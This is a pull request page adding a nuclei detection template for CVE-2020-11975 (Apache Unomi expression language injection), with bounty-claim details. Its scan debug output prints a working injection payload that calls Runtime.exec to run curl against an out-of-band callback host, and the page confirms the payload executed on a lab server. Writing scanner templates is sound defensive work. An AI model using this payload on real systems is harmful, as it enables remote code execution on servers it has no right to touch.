PR
Create CVE-2020-11975.yaml
projectdiscovery/nuclei-templates#12678
Template / PR Information
Added CVE-2020-11975 : Apache Unomi - Expression Language Injection
Template Validation
I’ve validated this template locally?
- YES
- NO
└─$ nuclei -u http://192.168.1.32:8181 -t CVE-2020-11975.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.2
projectdiscovery.io
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.2 (outdated)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2020-11975] Dumped HTTP request for http://192.168.1.32:8181/context.json
POST /context.json HTTP/1.1
Host: 192.168.1.32:8181
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 737
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip
{
"personalizations":[
{
"id":"gender-test_anystr",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl d1v446p3hd7d1eercva0fr1a6jhfyw5jd.oast.live\"))",
"comparisonOperator":"equals_anystr",
"propertyValue":"male_anystr"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"test-demo-session-id"
}
[DBG] [CVE-2020-11975] Dumped HTTP response http://192.168.1.32:8181/context.json
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: OPTIONS, POST, GET
Access-Control-Allow-Origin: *
Content-Type: application/json;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(9.3.21.v20170918)
Set-Cookie: context-profile-id=8911110f-537c-4ca9-8202-a5d15960b890;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
Set-Cookie: context-profile-id=8a3e4471-6754-4dfe-b367-c846334069c0;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
{"profileId":"8a3e4471-6754-4dfe-b367-c846334069c0","sessionId":"test-demo-session-id","profileProperties":null,"sessionProperties":null,"profileSegments":null,"filteringResults":null,"personalizations":{"gender-test_anystr":["var2"]},"trackedConditions":[],"anonymousBrowsing":false,"consents":{}}
[d1V446p3HD7d1EercvA0fr1A6jhfyw5jD] Received DNS interaction from 172.253.220.24 at 2025-07-21 13:35:25
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. IN A
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. IN A
;; ANSWER SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN A 178.128.210.172
;; AUTHORITY SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN NS ns1.oast.live.
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN NS ns2.oast.live.
;; ADDITIONAL SECTION:
ns1.oast.live. 3600 IN A 178.128.210.172
ns2.oast.live. 3600 IN A 178.128.210.172
[CVE-2020-11975:word-1] [http] [critical] http://192.168.1.32:8181/context.json
/claim #12668
Additional References:
Claim
Total prize pool
$50
Total paid
$50
Status
Approved
Submitted
July 21, 2025
Last updated
July 21, 2025
Contributors
SO
Sourabh Sahu
@Sourabh-Sahu
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$50
paid